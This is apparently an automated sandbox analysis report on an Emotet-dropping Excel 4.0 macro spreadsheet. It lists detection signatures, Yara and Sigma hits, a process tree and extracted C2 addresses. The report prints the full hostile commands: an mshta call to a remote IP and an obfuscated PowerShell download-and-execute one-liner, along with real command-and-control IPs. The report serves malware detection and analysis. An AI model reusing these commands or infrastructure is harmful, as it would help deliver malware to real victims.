Windows Analysis Report
80_513972285.xls

Overview

General Information

Sample Name: 80_513972285.xls
Analysis ID: 562424
MD5: c130bfd7e7632f18fcd505d0991f192f
SHA1: da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256: eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2824 cmdline: cmd /c mshta http://91.240.118.168/qqw/aas/se.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/qqw/aas/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2132 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1524 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2544 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Source | Rule | Description | Author | Strings
80_513972285.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
80_513972285.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
80_513972285.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\80_513972285.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\80_513972285.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\Users\user\Desktop\80_513972285.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0
C:\ProgramData\QWER.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
17.2.rundll32.exe.330000.2.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
17.2.rundll32.exe.28f0000.12.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2890000.9.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
12.2.rundll32.exe.2810000.8.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.rundll32.exe.2280000.6.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

System Summary

Source: File created, Author: Florian Roth, Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
Source: Process started, Author: Florian Roth, Data: Command: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2824, ProcessCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2840
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2648, ProcessCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2824
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
Source: Process started, Author: Florian Roth, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

AV Detection

Source: 10.2.rundll32.exe.2130000.4.raw.unpack, Malware Configuration Extractor: Emotet
Source: 80_513972285.xls, ReversingLabs: Detection: 33%
Source: kuyporn.com, Virustotal: Detection: 9%
Source: C:\ProgramData\QWER.dll, Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
